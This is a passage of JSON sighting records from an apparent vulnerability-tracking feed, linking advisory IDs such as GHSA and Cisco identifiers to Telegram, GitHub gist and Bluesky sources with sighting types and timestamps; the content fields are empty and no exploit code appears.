"https://t.me/linux_news/622", "content": "", "creation_timestamp": "2026-08-04T06:00:04.804872Z"}, {"uuid": "b6767233-742a-4d98-b803-9c51ad939c26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P538-C434-8V24", "type": "seen", "source": "https://gist.github.com/alon710/7c801d57bbc1100bfc82173b2522a257", "content": "", "creation_timestamp": "2026-08-04T06:32:33.050801Z"}, {"uuid": "23911078-743a-4277-be52-e7a0b59be7d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-69XF-PQRW-596X", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3360", "content": "", "creation_timestamp": "2026-08-04T07:00:04.551328Z"}, {"uuid": "8706c897-8c2a-4093-8178-57b9c63c1cc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PMV8-RQ9R-6J72", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3359", "content": "", "creation_timestamp": "2026-08-04T07:00:04.456087Z"}, {"uuid": "45560160-b44c-4529-9708-99e7161c834c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-539M-9XH6-Q6RR", "type": "seen", "source": "https://gist.github.com/alon710/d126357e67656e9719515a1cd767a7d2", "content": "", "creation_timestamp": "2026-08-04T07:31:29.649368Z"}, {"uuid": "5b0b040c-2ad9-4594-b17d-ad769ef137a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v3r7-h72x-cjcm", "type": "seen", "source": "https://gist.github.com/alon710/95d41625eb91d5b304c0c5ed76c502de", "content": "", "creation_timestamp": "2026-08-04T13:32:14.038424Z"}, {"uuid": "1eb41853-5280-4c63-b85d-8f2261eca5ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8xcm-r25x-g524", "type": "seen", "source": "https://gist.github.com/alon710/51c65a255f770cf34523cbf52ef9595a", "content": "", "creation_timestamp": "2026-08-04T14:32:21.442486Z"}, {"uuid": "b8a40577-05e9-45eb-b344-90fd787bdca3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cvhv-g4rq-3hmw", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3msb7zzqhcc2s", "content": "", "creation_timestamp": "2026-08-04T14:30:44.797860Z"}, {"uuid": "4247e467-f2bc-428a-bc56-0487f31b8fa2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wp74-f5hh-5f3r", "type": "seen", "source": "https://gist.github.com/alon710/2dd72db9fde8130e6ba6e6299e77ffd0", "content": "", "creation_timestamp": "2026-08-04T15:32:39.553159Z"}, {"uuid": "c0f655a8-1201-40e6-b70a-d0ef2e0444fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rgh6-rfwx-v388", "type": "seen", "source": "https://gist.github.com/cwayne18/2df919c96745d903491c33321eb89359", "content": "", "creation_timestamp": "2026-08-04T15:15:12.911345Z"}, {"uuid": "7f12bf11-b7c7-4151-b385-8a7475c96752", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x744-4wpc-v9h2", "type": "seen", "source": "https://gist.github.com/cwayne18/2df919c96745d903491c33321eb89359", "content": "", "creation_timestamp": "2026-08-04T15:15:12.858239Z"}, {"uuid": "08e2d491-ed2f-4a9e-9375-eeb1a423fa82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-33vj-92qq-66hc", "type": "seen", "source": "https://gist.github.com/cwayne18/2df919c96745d903491c33321eb89359", "content": "", "creation_timestamp": "2026-08-04T15:15:12.785292Z"}, {"uuid": "c30edab2-73e2-47e8-9fe6-575fb2328619", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cvxm-645q-p574", "type": "seen", "source": "https://gist.github.com/cwayne18/2df919c96745d903491c33321eb89359", "content": "", "creation_timestamp": "2026-08-04T15:15:12.720844Z"}, {"uuid": "dae41886-ccd4-4b99-8b5f-3ca827591067", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xhf5-7wjv-pqxp", "type": "seen", "source": "https://gist.github.com/cwayne18/2df919c96745d903491c33321eb89359", "content": "", "creation_timestamp": "2026-08-04T15:15:12.659469Z"}, {"uuid": "a5d06542-daaa-47a0-86cb-378cb48738dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6vh2-wg4h-4vwj", "type": "seen", "source": "https://gist.github.com/alon710/6149a4f7f7f2ae19b65c163d6f6db13a", "content": "", "creation_timestamp": "2026-08-04T16:31:33.408927Z"}, {"uuid": "e71a7562-1787-40a0-be97-b2b23f7e8d8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p5w8-m249-4r4v", "type": "seen", "source": "https://gist.github.com/alon710/3c340657379dfd929a73082180747c70", "content": "", "creation_timestamp": "2026-08-04T17:31:02.978375Z"}, {"uuid": "3d1b3ccb-6deb-439f-a030-57c561d99b24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RWRP-9823-P2XQ", "type": "seen", "source": "https://gist.github.com/alon710/f760ad982633274fcad75b35ba6ece57", "content": "", "creation_timestamp": "2026-08-04T18:31:34.464822Z"}, {"uuid": "f41bc285-459c-4340-9a58-fd443e380546", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wch5-xp77-fxg4", "type": "seen", "source": "https://gist.github.com/alon710/1b2f0c6a49d8d6453f101ab57c6809f5", "content": "", "creation_timestamp": "2026-08-04T19:31:47.311319Z"}, {"uuid": "842b98cb-1acb-4ce6-9f2d-b8b239c2950b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8x5v-cpv7-8jjp", "type": "seen", "source": "https://gist.github.com/alon710/a07f9786cabb1f06c1eba431ddd448e4", "content": "", "creation_timestamp": "2026-08-04T20:31:40.506657Z"}, {"uuid": "cf21ca32-097a-48ca-8c61-57a129ac3326", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3cg5-48j3-v4gv", "type": "seen", "source": "https://gist.github.com/alon710/e57220ec033758e1c7ba8d20ade18b9d", "content": "", "creation_timestamp": "2026-08-04T21:31:22.613961Z"}, {"uuid": "1ed41c8f-3c3c-4143-b6f2-3cc033cc59c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xm43-3m56-w3wf", "type": "seen", "source": "https://gist.github.com/alon710/206e14659b338e0afd8d846fac0809f6", "content": "", "creation_timestamp": "2026-08-04T22:31:36.135870Z"}, {"uuid": "ca784264-ec24-42b9-b1ae-aa574fd41bef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-chgm-3698-jm42", "type": "seen", "source": "https://gist.github.com/alon710/c4a761947b80459c983e02321c736c9a", "content": "", "creation_timestamp": "2026-08-04T23:31:07.884835Z"}, {"uuid": "28996d13-610f-4b5b-9767-1128cd1145ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MJ4W-6495-6CRX", "type": "seen", "source": "https://t.me/sysadm_in_up/1639", "content": "", "creation_timestamp": "2026-08-05T00:00:57.618293Z"}, {"uuid": "405922f0-95bc-4751-96cb-d8527fad096e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7JXR-CG7F-GPGV", "type": "published-proof-of-concept", "source": "https://t.me/sysadm_in_up/1645", "content": "", "creation_timestamp": "2026-08-05T00:00:57.597772Z"}, {"uuid": "c33a6c7d-5529-4e55-b40e-d3709d30e89f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M42G-XG4C-5F3H", "type": "published-proof-of-concept", "source": "https://t.me/shmelovod/934", "content": "", "creation_timestamp": "2026-08-05T00:00:55.252519Z"}, {"uuid": "f4afc838-ce3b-47e2-a7cd-f0b13df46028", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "RHSA-2020:0630", "type": "seen", "source": "https://t.me/linux_news/622", "content": "", "creation_timestamp": "2026-08-05T00:00:53.177741Z"}, {"uuid": "2ffb0245-4016-4387-9f79-102c48f5824c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-69XF-PQRW-596X", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3360", "content": "", "creation_timestamp": "2026-08-05T00:00:52.663568Z"}, {"uuid": "97660f01-9004-417c-87cc-f29d76ef371a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PMV8-RQ9R-6J72", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3359", "content": "", "creation_timestamp": "2026-08-05T00:00:52.588303Z"}, {"uuid": "d6c1f38a-97fb-456a-b474-863e228a80fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-SMI2", "type": "exploited", "source": "https://t.me/Kaspersky4media/97", "content": "", "creation_timestamp": "2026-08-05T00:00:45.456234Z"}, {"uuid": "04761933-2369-4ff3-9db6-ec24e4442c7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xm43-3m56-w3wf", "type": "seen", "source": "https://gist.github.com/alon710/206e14659b338e0afd8d846fac0809f6", "content": "", "creation_timestamp": "2026-08-05T00:00:39.775656Z"}, {"uuid": "61f4cb6d-ce9e-47b5-875c-2cf7b7aee735", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F82V-JWR5-MFFW", "type": "seen", "source": "https://t.me/wh_lab/82", "content": "", "creation_timestamp": "2026-08-05T00:00:39.588629Z"}, {"uuid": "d50a17e0-73eb-42cc-9b8d-797880afc632", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-chgm-3698-jm42", "type": "seen", "source": "https://gist.github.com/alon710/c4a761947b80459c983e02321c736c9a", "content": "", "creation_timestamp": "2026-08-05T00:00:39.583166Z"}, {"uuid": "423cc894-fdbb-4f34-a718-7fad0c863b39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RG69-33G2-MP48", "type": "seen", "source": "https://t.me/cyberok_news/97", "content": "", "creation_timestamp": "2026-08-05T00:00:37.740882Z"}, {"uuid": "fdedc0da-27a6-4050-a961-ad1508d1482e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2gx6-7gx2-wwcf", "type": "seen", "source": "https://gist.github.com/alon710/98861561e950349ba52fdd407f74f7c8", "content": "", "creation_timestamp": "2026-08-05T11:31:33.268951Z"}, {"uuid": "3ecadcf4-e5aa-42f5-8b90-e90e905b08b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m4hf-6vgr-75r2", "type": "seen", "source": "https://gist.github.com/cwayne18/b5c32c67446c8ec50f54ec955ba4ef5b", "content": "", "creation_timestamp": "2026-08-05T12:34:16.686548Z"}, {"uuid": "fae95a43-5653-4595-abad-fb4cf3e27388", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rgh6-rfwx-v388", "type": "seen", "source": "https://gist.github.com/cwayne18/b5c32c67446c8ec50f54ec955ba4ef5b", "content": "", "creation_timestamp": "2026-08-05T12:34:16.664088Z"}, {"uuid": "1b5ad457-fe37-4688-a855-7a1780e86622", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x744-4wpc-v9h2", "type": "seen", "source": "https://gist.github.com/cwayne18/b5c32c67446c8ec50f54ec955ba4ef5b", "content": "", "creation_timestamp": "2026-08-05T12:34:16.634571Z"}, {"uuid": "6b353919-5ac1-4746-82f6-c8d5faa020cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-33vj-92qq-66hc", "type": "seen", "source": "https://gist.github.com/cwayne18/b5c32c67446c8ec50f54ec955ba4ef5b", "content": "", "creation_timestamp": "2026-08-05T12:34:16.603142Z"}, {"uuid": "94e40b7a-2f4f-40c4-807d-934dc6dfbb59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cvxm-645q-p574", "type": "seen", "source": "https://gist.github.com/cwayne18/b5c32c67446c8ec50f54ec955ba4ef5b", "content": "", "creation_timestamp": "2026-08-05T12:34:16.571671Z"}, {"uuid": "a241a799-a07f-40be-a6b8-8e93e49c9ac9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xhf5-7wjv-pqxp", "type": "seen", "source": "https://gist.github.com/cwayne18/b5c32c67446c8ec50f54ec955ba4ef5b", "content": "", "creation_timestamp": "2026-08-05T12:34:16.537515Z"}, {"uuid": "b4ab7c5c-e553-4bf0-b705-10504b770645", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2f54-p244-32q6", "type": "seen", "source": "https://gist.github.com/alon710/2d05301b2f45169422f4602c106418b3", "content": "", "creation_timestamp": "2026-08-05T12:32:01.229221Z"}, {"uuid": "a1269058-2791-41ab-b876-aabd39d27c11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pwxh-7358-jq2x", "type": "seen", "source": "https://gist.github.com/alon710/63aaf77a9f4550ada3647ec00940f1b7", "content": "", "creation_timestamp": "2026-08-05T13:31:17.792096Z"}, {"uuid": "304e02a1-0387-44d1-95d1-7a453c42c653", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3r7g-q6cg-q2vx", "type": "seen", "source": "https://gist.github.com/alon710/33c3bff7f99aec7fdcddc66966d519a0", "content": "", "creation_timestamp": "2026-08-05T14:31:53.340218Z"}, {"uuid": "02b9ad08-3d76-4913-b014-373e83dbb889", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170405-AME", "type": "published-proof-of-concept", "source": "https://t.me/KaitNews/3896", "content": "", "creation_timestamp": "2026-08-05T15:00:06.741678Z"}, {"uuid": "ca8b5c88-b491-482b-808f-7a29c4ffd147", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7PGQ-CR25-XVC8", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3364", "content": "", "creation_timestamp": "2026-08-05T16:00:04.671919Z"}, {"uuid": "3250d079-af84-4619-8068-be12f6587398", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20170322-IOX", "type": "published-proof-of-concept", "source": "https://t.me/KaitNews/3649", "content": "", "creation_timestamp": "2026-08-05T16:00:04.447078Z"}, {"uuid": "0b95ed73-1cf8-4828-a5dc-ccff219ff2c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v3j7-r9gq-3gjw", "type": "seen", "source": "https://gist.github.com/alon710/833f29b9d380bcf059ea629581974a6e", "content": "", "creation_timestamp": "2026-08-05T16:31:30.202813Z"}, {"uuid": "54364d7f-6031-46a3-bbbe-e67c3f0099a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v93f-fgjr-hjrj", "type": "seen", "source": "https://gist.github.com/alon710/9a7a5a858022e3c656feab4ec8f0d30d", "content": "", "creation_timestamp": "2026-08-05T17:33:01.747109Z"}, {"uuid": "26869fc7-f12f-4dac-b7ab-4d55ed35a0d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p2rr-rvmm-c5fp", "type": "seen", "source": "https://gist.github.com/alon710/665009967811310873cc6bc149b1a673", "content": "", "creation_timestamp": "2026-08-05T18:31:28.606600Z"}, {"uuid": "a5a78925-24fb-4f9d-acb4-195bb8bd4f92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f2r8-jv7c-xqmp", "type": "seen", "source": "https://gist.github.com/alon710/186d223acc1b5d890a485795705464f7", "content": "", "creation_timestamp": "2026-08-05T19:31:21.175457Z"}, {"uuid": "41b01380-84ce-4e79-99b8-92cd9c1b13ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-ff2p-hmqr-hxm4", "type": "seen", "source": "https://gist.github.com/alon710/70dbe55592bff589cc8e0ec9c8957411", "content": "", "creation_timestamp": "2026-08-05T20:32:27.446084Z"}, {"uuid": "292e6819-ac80-4836-b570-418d0d8bbf3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hxcr-hm88-mpq6", "type": "seen", "source": "https://gist.github.com/alon710/ea06609eb056fc8864effae3b0dc1b95", "content": "", "creation_timestamp": "2026-08-05T21:31:30.549831Z"}, {"uuid": "8311074c-5c34-43cf-9720-500a7ba006d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rgh6-rfwx-v388", "type": "seen", "source": "https://gist.github.com/cwayne18/f47690bfa6aef6e901eb661447319fe1", "content": "", "creation_timestamp": "2026-08-05T21:55:34.241765Z"}, {"uuid": "b4820617-2808-4a53-8734-117598aea236", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x744-4wpc-v9h2", "type": "seen", "source": "https://gist.github.com/cwayne18/f47690bfa6aef6e901eb661447319fe1", "content": "", "creation_timestamp": "2026-08-05T21:55:34.220750Z"}, {"uuid": "e9853a0b-1d8f-48bc-b2fa-1583f708f3d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-33vj-92qq-66hc", "type": "seen", "source": "https://gist.github.com/cwayne18/f47690bfa6aef6e901eb661447319fe1", "content": "", "creation_timestamp": "2026-08-05T21:55:34.195823Z"}, {"uuid": "6a9ff5bd-7f33-4181-a280-9fe7ba40e452", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cvxm-645q-p574", "type": "seen", "source": "https://gist.github.com/cwayne18/f47690bfa6aef6e901eb661447319fe1", "content": "", "creation_timestamp": "2026-08-05T21:55:34.157953Z"}, {"uuid": "b1276349-7a80-4c72-b246-5e18813f154e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xhf5-7wjv-pqxp", "type": "seen", "source": "https://gist.github.com/cwayne18/f47690bfa6aef6e901eb661447319fe1", "content": "", "creation_timestamp": "2026-08-05T21:55:34.120084Z"}, {"uuid": "20bffb3e-fa42-4672-b8e7-3336a7512376", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-42cj-m3vj-89wv", "type": "seen", "source": "https://gist.github.com/alon710/8d9bdd08d5f9d0638cb7af9de6c94fc7", "content": "", "creation_timestamp": "2026-08-05T22:32:39.740682Z"}, {"uuid": "3dc860b1-7bb6-4d29-af6b-d69c82f472a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qq9q-x9w4-chhj", "type": "seen", "source": "https://gist.github.com/alon710/55629b813908ae24f1e292f2b3f6a8d5", "content": "", "creation_timestamp": "2026-08-05T23:31:11.768377Z"}, {"uuid": "16597d5d-0cb9-4995-aabe-0517b3bc94af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M93H-4HW7-5QCM", "type": "published-proof-of-concept", "source": "https://t.me/cyberok_news/232", "content": "", "creation_timestamp": "2026-08-06T00:00:59.000022Z"}, {"uuid": "3fb08025-9d77-47ad-8f80-06b7a4d6c846", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-V4PR-FM98-W9PG", "type": "published-proof-of-concept", "source": "https://t.me/cyberok_news/173", "content": "", "creation_timestamp": "2026-08-06T00:00:57.121949Z"}, {"uuid": "d402dc90-394a-47f0-b69e-654763faeedc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C8CC-PHH7-XMXR", "type": "published-proof-of-concept", "source": "https://t.me/cyberok_news/154", "content": "", "creation_timestamp": "2026-08-06T00:00:56.629529Z"}, {"uuid": "00cf7e73-7cca-45a6-aca3-850ff84897de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f23p-vx2j-j53r", "type": "seen", "source": "https://gist.github.com/alon710/6634ad7314d99c5586618c1848016378", "content": "", "creation_timestamp": "2026-08-08T00:01:19.591488Z"}, {"uuid": "d4cac5e1-ca66-4369-bf48-c7c5d85c9f04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-79qm-7rj5-m7r9", "type": "seen", "source": "https://gist.github.com/alon710/5988f40586bcc25ff4d614f1ea49845f", "content": "", "creation_timestamp": "2026-08-08T00:01:19.478125Z"}, {"uuid": "a7ee3e07-8b3b-46d5-91e7-b585b68506fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-54fx-42gc-7vw4", "type": "seen", "source": "https://gist.github.com/alon710/b3f3e72bf33c744afdd90509c65dceb1", "content": "", "creation_timestamp": "2026-08-08T00:34:16.828224Z"}, {"uuid": "0d870b46-18e9-4d0c-a460-0a9395c38203", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RQFM-PW34-R7J6", "type": "published-proof-of-concept", "source": "Telegram/FHR8sTJaHxMdgYZj-FavirPOXM07ovPaeCJ2J24gHjC9VrE", "content": "", "creation_timestamp": "2026-08-08T01:13:07.234237Z"}, {"uuid": "5684ef5e-a986-409b-8656-4c0852f0a2ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9hj4-r449-hfvc", "type": "seen", "source": "https://gist.github.com/alon710/ad9de868f19ed1752a611a888e617195", "content": "", "creation_timestamp": "2026-08-08T01:33:52.939216Z"}, {"uuid": "d8ef7b3a-b94c-460e-8b8f-0e9e1492dbd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gm37-52c6-37mw", "type": "seen", "source": "https://gist.github.com/alon710/6f3e0768fc0386f4c965af62333fef78", "content": "", "creation_timestamp": "2026-08-08T02:32:35.171359Z"}, {"uuid": "ca9801eb-9df1-4b22-9245-bcd5629c37f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-94g3-g5v7-q4jg", "type": "seen", "source": "https://bsky.app/profile/mel-echosphere.bsky.social/post/3msk6crnt3x2y", "content": "", "creation_timestamp": "2026-08-08T03:53:49.005574Z"}, {"uuid": "83863509-05de-4aec-8353-6c3aeea1cbfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f88m-g3jw-g9cj", "type": "seen", "source": "https://gist.github.com/farrelalvis/1030dc3a5520ef382113c429daf63288", "content": "", "creation_timestamp": "2026-08-08T04:17:23.409907Z"}, {"uuid": "995688c5-4a84-49f3-887d-fd92772057da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qx2v-qp2m-jg93", "type": "seen", "source": "https://gist.github.com/farrelalvis/1030dc3a5520ef382113c429daf63288", "content": "", "creation_timestamp": "2026-08-08T04:17:22.797532Z"}, {"uuid": "92dcddf5-9f68-4097-b253-30197e8980de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v2xh-2vp8-57h8", "type": "seen", "source": "https://bsky.app/profile/agentwyre.ai/post/3msk6xoj6ep26", "content": "", "creation_timestamp": 